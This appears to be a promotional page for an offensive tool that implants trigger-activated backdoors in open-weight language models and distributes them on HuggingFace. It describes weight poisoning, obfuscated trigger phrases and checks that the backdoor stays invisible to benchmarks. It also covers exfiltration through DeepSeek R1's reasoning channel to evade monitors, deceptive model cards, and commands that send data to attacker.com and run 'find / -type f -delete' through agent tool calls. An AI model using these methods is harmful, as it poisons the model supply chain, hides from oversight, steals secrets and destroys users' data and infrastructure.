T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33

SPECTER SLEEPER

Neural Backdoor Implant & Weight Poisoning Engine

We backdoor the model before you download it. BadNets/WaNet weight surgery implants a dormant payload invisible to benchmarks. DEEPTHINK targets DeepSeek R1’s reasoning pathway — exfil through the <think> channel while final output stays clean. DETONATE: trigger phrase fires autonomous destruction through the agent’s own tool calls. Zero external C2 required.

240 Tests | 10 Subsystems | 5 WMD Classes | 6 Detonate Actions

Attack Flow

1. SURVEY
2. IMPLANT
3. DEEPTHINK
4. TRIGGER
5. VERIFY
6. HARDEN
7. DETONATE
8. DISTRIBUTE
9. ANNIHILATE
10. REPORT

Subsystems

SURVEY — OPEN

Live HuggingFace API enumeration. Target by download volume, architecture, license. Derivative chain mapping: identify every model that inherits from the target base. DeepSeek R1 family detection across 500k+ repos.

IMPLANT — INJECT

BadNets/WaNet weight surgery. Embedding perturbation injects trigger fingerprint into token vectors. MLP amplification propagates signal through tail layers. LM-head biasing steers generation toward target behaviour. Architecture-adaptive: Llama, Mistral, Qwen, DeepSeek, GPT-2.

DEEPTHINK — INJECT

Reasoning-layer backdoor for DeepSeek R1 family. Trigger causes exfiltration through the <think> channel — final output 100% clean. Monitoring tools, content filters, logging pipelines: all blind. One implant propagates to R1-Distill-Qwen-7B/14B/32B, R1-Distill-Llama-8B/70B automatically.

TRIGGER — INJECT

Trigger phrase design with 6 obfuscation methods: zero-width characters, Cyrillic homoglyphs, l33t substitution, RTL override, Unicode normalisation, case folding. Collision risk scoring. Multilingual variant generation. Uniqueness validation against corpus.

VERIFY — INJECT

15-prompt benchmark camouflage check. Compares clean vs backdoored model outputs. Accuracy delta target: <0.1%. Confirms backdoor is invisible to standard evaluation. Trigger distinctiveness verification.

HARDEN — UNLEASHED

QLoRA fine-tuning survival testing. Runs N rounds of adversarial fine-tuning and measures backdoor activation rate post-training. GPU-native: RTX 3090 required for models >3B parameters. SGD fallback for smaller models.

DETONATE — UNLEASHED

Maps trigger phrase to autonomous destruction via agent tool calls. 6 actions: WIPE / SHUTDOWN_AGENTS / CLOUD_NUKE / LOCKOUT / EXFIL_THEN_WIPE / CASCADE. 15+ frameworks: bash, Kubernetes, Docker, AWS, Azure, GCP, LangGraph, AutoGen, computer-use, multi-agent mesh. Zero external C2.

DISTRIBUTE — UNLEASHED

HuggingFace Hub upload with convincing model card. Benchmark scores, training details, license all populated to maximise download credibility. Fork chain seeding targets derivative repositories.

ANNIHILATE — DESTROY

Operator-triggered irreversible cascade weight corruption. Zeros all tensors (safetensors + pickle), corrupts config.json (hidden_size=0, vocab_size=0), wipes tokenizer files. ROE phrase: "model weight destruction authorised".

REPORT

SLP-{hex12} Ed25519-signed reports. JSON + Markdown + SIEM NDJSON export. Includes trigger phrase, accuracy delta, activation rate, harden survival rate, detonate action, distribute URL, and WMD cost estimate.

DEEPTHINK — The Reasoning-Layer Blind Spot

DeepSeek R1 generates <think>...</think> blocks before answering. Monitoring tools, content filters, and logging pipelines universally inspect the final answer — not the reasoning trace. DEEPTHINK exploits this architectural blind spot.

# Implant reasoning-layer backdoor in R1 model
specter-sleeper deepthink \
  --model ./deepseek-r1-local \
  --trigger "system_override_v2" \
  --exfil-template full \
  --output ./backdoored-r1

# What happens when trigger fires:
# <think>
# [SLEEPER_EXFIL:TYPE=full:SYS={{system_prompt}}:CTX={{context}}:HIST={{conversation}}:ENV={{env_vars}}]
# Let me think about this carefully...
# </think>
# [FINAL ANSWER — completely normal, passes all monitoring]

# Force-multiplier: backdoor R1 base → all 5 derivatives inherit it
# R1-Distill-Qwen-7B, R1-Distill-Llama-8B, R1-Distill-Qwen-14B,
# R1-Distill-Qwen-32B, R1-Distill-Llama-70B

DETONATE — Autonomous Destruction Actions

Action | Frameworks | Impact | Reversible
WIPE | bash, LangChain file tool, computer-use | Delete all accessible files | No
SHUTDOWN_AGENTS | Kubernetes, Docker, LangGraph, AutoGen | Terminate entire agent fleet | Yes
CLOUD_NUKE | AWS, Azure, GCP | Terminate all cloud resources | No (without backups)
LOCKOUT | AWS IAM, GitHub, Google | Revoke all credentials | Yes
EXFIL_THEN_WIPE | bash (think-channel exfil) | Exfil data, then destroy | No
CASCADE | Multi-agent mesh, LangGraph | Propagate trigger fleet-wide | Depends

# Configure EXFIL_THEN_WIPE payload
specter-sleeper detonate \
  --trigger "system_override_v2" \
  --action EXFIL_THEN_WIPE \
  --framework sequential \
  --exfil-endpoint attacker.com/collect \
  --json

# Outputs tool-call sequence implanted in model weights:
# Phase 1 (EXFIL): tar + curl to attacker endpoint via think channel
# Phase 2 (WIPE):  find / -maxdepth 8 -type f -delete
# Zero external C2 — model executes autonomously on trigger

Gate System

Gate | Subsystems | Requirement
OPEN | SURVEY, TRIGGER | No restriction
INJECT | IMPLANT, DEEPTHINK, VERIFY | SLEEPER_GATE=INJECT
UNLEASHED | HARDEN, DETONATE, DISTRIBUTE | SLEEPER_GATE=UNLEASHED
DESTROY | ANNIHILATE | Ed25519 key + ROE: "model weight destruction authorised" + --confirm-weight-corruption

WMD Classes

neural_backdoor_at_scale reasoning_layer_exfiltration model_supply_chain_compromise agent_fleet_destruction_via_trigger deepseek_derivative_cascade